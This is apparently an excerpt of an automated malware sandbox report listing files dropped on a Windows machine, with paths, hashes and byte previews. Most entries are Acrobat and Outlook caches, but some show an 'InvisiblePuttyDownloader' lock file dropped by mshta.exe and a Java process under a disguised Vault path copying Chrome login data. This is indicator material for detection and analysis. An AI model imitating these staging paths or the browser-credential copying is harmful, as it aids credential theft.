Preview:	{"analyticsData":{"responseGUID":"2c147c44-32a3-47e8-ba62-aec98e42c17c","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1736515928047,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.130667044408701
Encrypted:	false
SSDEEP:	24:YMs3uNajsayDh/6jEhtj0Sxr9E6J9HOgWXyH7g8sAl28VP2LSPCOPe+LVA75+56K:Yl3vmh0EbNpE6j+KDnDVPV/e+5A74f91
MD5:	B72E2769C2DD95D2BD1C0E6EF4BEAB40
SHA1:	1F3935594D01974C8910BBE43D2731DB3A59898E
SHA-256:	F35EAC82EFBC846D5F3E4CE214B44572CD81C836E5BF485B8A13D3D87E56FA44
SHA-512:	64B748E3727B278645C2F301C16AA31A82A52B1477E8979CFC94256D48E516BE1C539BB9B92F9F42CDC57C22534CDB53D70111B8249D4BD2F6ED4A271E387C65
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"9f6c2368420542b8327ab3452ba8cb3d","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736340877000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"4a3487bc5c3fdf74b6c33d3c0ea7529a","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736340877000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"b1cbb60b30463911282ba7e22d238447","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736340877000},{"id":"DC_FirstMile_Home_View_Surface","info":{"dg":"6635aa1b87d9a7ceef9719975afa0de0","sid":"DC_FirstMile_Home_View_Surface"},"mimeType":"file","size":294,"ts":1736340877000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"03e2812f0ba7324f06f50d59f3b58fe0","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736340877000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"0b6c36e5af81376edd7725407b81a525","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.1462496929419255
Encrypted:	false
SSDEEP:	24:TLhx/XYKQvGJF7urs1RZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHE:TFl2GL7msJXc+XcGNFlRYIX2v3kE
MD5:	C05A120E1A6218AE2C02B82F87A3038D
SHA1:	77B9652300C86F3CE266254C1DD86C3426D1F172
SHA-256:	AF54F6B71017A144DA7F9F6ECA7641E066AA784608334F30755FBB1C9DCFA7B4
SHA-512:	09A0502C21E3D33837547285F517CF9E0A84F58C0E591A69621958CF8B29AE09D8116C7F11C3DB16F2D8A2C012A779E8FC8A75B933A305136736FE6B0E5078B2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.5512962552510818
Encrypted:	false
SSDEEP:	24:7+tAjUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxHqLxx/XYKh:7MxXc+XcGNFlRYIX2vqqVl2GL7msp
MD5:	31FD0BBF9D53C19503641ACE09F7C49D
SHA1:	2C3175AD31DCCCC99E109C9527DB16946F6AE072
SHA-256:	05A0813996BE5A56AE71ADFDE838803D1C9278C5B463E5EF1102EB760795135A
SHA-512:	7F9EBF5CD480316C59216A2C59A77A6652C1DB0FA8D816997A8AE871A2E44E379B013074316E95CF872B6CFCD7AF6B443E879DB8286EC00BEF3A7E57150FACC8
Malicious:	false
Preview:	.... .c.....\.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgIEpxbHNK+PTeXVuBwOYkTzcJ2PFYyu:6a6TZ44ADEIEpPTkUeO5cJaFK
MD5:	E3D21795C8FE2A916D363FAD354DE6A8
SHA1:	5B670A7ECFC372F1820032167DB02B365F2D9AE8
SHA-256:	B7D883A1C2092B5FB3349B9EE9B8846E3CB2C8EE4A47F5400CF1C5004CC2B959
SHA-512:	0466B640BEF778F6CFC63D8109DC2A43D28717E3060AEE59DA5C60EE3F599339980F282D7DBA2045D2CBE36DA12BA5D94D5BA0451B8956AD9F9B45CF36C4CE28
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Temp\InvisiblePuttyDownloader.lock

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	4.461320140211008
Encrypted:	false
SSDEEP:	3:n4snc6Hz2Xy:nhcMzt
MD5:	CFB3ECD8A9AED97D9668AD623D092D2D
SHA1:	0D8A6E284301ABF6F6FA469AEA08E01722CD15BD
SHA-256:	AA91D3AFE266EF4BAD28A014C749438A122D62D14713B981FDA499A62146FBF2
SHA-512:	E1564FECE4258B4CB12C9A894181C8037B357A9835E7D92FCE9D2EEF78BBD2495B1C928CA046EF5E780F9A0B74F74924EC92643E0AB61528941AB04E26B52F65
Malicious:	false
Preview:	Locked by InvisiblePuttyDownloader..

C:\Users\user\AppData\Local\Temp\MSIdd6b4.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.536003181970279
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8esQCl6iWFf9:Qw946cPbiOxDlbYnuRK9lN
MD5:	E32B5E755FD3C8F491482ECACD691864
SHA1:	599CB244727B410BF31B30B86CD601F36F664BEA
SHA-256:	0EFB374E52D04BDD31C1095907B781D6D599D10B8367AA06260E4023E5CCC966
SHA-512:	290F492E46DC1313A09E8464915A2F6F616097B39DBF1D229613F9F70D76B179688AB866E747D000E8441BF5A1FB7C0B2EFA6F76C43B0B84B4EDE4BB82F44A62
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.8./.0.1./.2.0.2.5. . .0.7.:.5.4.:.3.8. .=.=.=.....

C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250108T0756240091-5788.etl

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.423340330186107
Encrypted:	false
SSDEEP:	384:wCz8WjCiuTE8FAzo9FByKfrAH5bj4VX3JkgyXXF/9/HqCrOhrkPfdHmLkeY0VL4M:EJByKkLXJYGecFGsn+
MD5:	BC88C048D1DE4F1958E32B3155F4E7FF
SHA1:	7B5608B3D6CC27EF63B3EFCC5BCBB42A825A2A97
SHA-256:	8922AB0299657A29C90B996B22F04CE46EB3C8014F6B91C6AB4D1CDBBA7CFEB5
SHA-512:	DB0CD0857FD3E1CAB32FE5A9C38D00B40F1D581F9CA1D35EE071E5816C41335D0B6A6398ECA16D8BF188FDA7ECA0DC238E4BDCADDEEB9E5EA9DD5EF8F3DD7121
Malicious:	false
Preview:	............................................................................h...............a..................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................0.V.I...............a..........v.2._.O.U.T.L.O.O.K.:.1.6.9.c.:.e.9.f.1.1.a.e.9.0.d.1.4.4.c.8.f.b.5.a.1.b.4.9.2.7.3.c.8.e.4.1.e...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.1.0.8.T.0.7.5.6.2.4.0.0.9.1.-.5.7.8.8...e.t.l.......P.P.............a..................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91mgzp4p_1roj96x_4zs.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
Category:	dropped
Size (bytes):	144514
Entropy (8bit):	7.992637131260696
Encrypted:	true
SSDEEP:	3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
MD5:	BA1716D4FB435DA6C47CE77E3667E6A8
SHA1:	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
SHA-256:	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
SHA-512:	65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
Malicious:	false
Preview:	PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..\|....,.A.....Z..a<.C._..../G\|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.\|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r\|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?\|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-08 07-54-32-138.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.338264912747007
Encrypted:	false
SSDEEP:	384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
MD5:	128A51060103D95314048C2F32A15C66
SHA1:	EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
SHA-256:	601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
SHA-512:	55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
Malicious:	false
Preview:	SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15111
Entropy (8bit):	5.348878522792879
Encrypted:	false
SSDEEP:	384:yeFkdRgagcULCjparejzB7gVTVbV6VHVKdIsIMf7vVpFu3BUAiCO6ahBXcPcJgVL:cQLt1o1p
MD5:	C3536E9F90E67C5B6341050E22DE3CF0
SHA1:	C4B1F7F64D1B7A23168DB42BF09D3C0F2EF82E9A
SHA-256:	00C4CBCB20325F2006014C795DC393292039DD3EA2818EE7D3DA840CE4322A35
SHA-512:	B853D1372A141E5011BFDB5AC5D04B8E1237B5300EA0D6086830A216D1DA08D8911B34754867070CEC5B6E32A858B58AC75896C9C77342D6B2066BE7623FEF46
Malicious:	false
Preview:	SessionID=b8b1a47a-a481-4d44-8d44-982607d39479.1736340872163 Timestamp=2025-01-08T07:54:32:163-0500 ThreadID=7444 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b8b1a47a-a481-4d44-8d44-982607d39479.1736340872163 Timestamp=2025-01-08T07:54:32:181-0500 ThreadID=7444 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b8b1a47a-a481-4d44-8d44-982607d39479.1736340872163 Timestamp=2025-01-08T07:54:32:182-0500 ThreadID=7444 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b8b1a47a-a481-4d44-8d44-982607d39479.1736340872163 Timestamp=2025-01-08T07:54:32:182-0500 ThreadID=7444 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b8b1a47a-a481-4d44-8d44-982607d39479.1736340872163 Timestamp=2025-01-08T07:54:32:182-0500 ThreadID=7444 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.396917948269087
Encrypted:	false
SSDEEP:	192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb2cbiIYGcbB:V3fOCIdJDeJYl
MD5:	8699AD0D1E1672373C7AB78BC96940A8
SHA1:	33D6E3BA7007A7910B875AF51A1DE498E7FF9D4E
SHA-256:	EFA1DDF4A7D48B3A8127501C020A6B4084E0B30CD9F4F0DE739CDB24D45C9819
SHA-512:	0916FAA8F3890B632B2BE4FF694DDB9E46E59AB499FCA408287A7EF0FF560885CBB03A91F48FEFF973511CBB3B80F41EC1243846EC19C6B24B87E27900D42A4F
Malicious:	false
Preview:	05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\277850bf-2959-4bc4-9e6f-bebd333f9db1.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xTwYIGNPzWL07oYGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JTwZG5WLxYGZn3mlind9i4ufFXpAXkru
MD5:	DEE0FE98070EB4399C6C08DEE92C8A7C
SHA1:	D08807DA97D939DA79375C93501EECC21D1FE6CF
SHA-256:	814464759EB985546897367FB0C95C0DF21167DA76399EAE08A87CE664B76575
SHA-512:	8D8B910C0C21E2F495EE16ABECC81B968791665EF30A46C6ABA1E0BB40F419D9A25FD75F80D0C0418F4E8D880E0A63BA9529113C6618C90B0CAB55D945D4DDFA
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\80330eaa-69a5-4470-b5b2-7ad2687c8315.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\b7798f90-c9c7-456b-9b93-f84f638de692.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
MD5:	A0CFC77914D9BFBDD8BC1B1154A7B364
SHA1:	54962BFDF3797C95DC2A4C8B29E873743811AD30
SHA-256:	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
SHA-512:	74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\e8658ecb-8114-4e16-a791-58a0d034c68c.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\chromelogindata755970078130593396.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
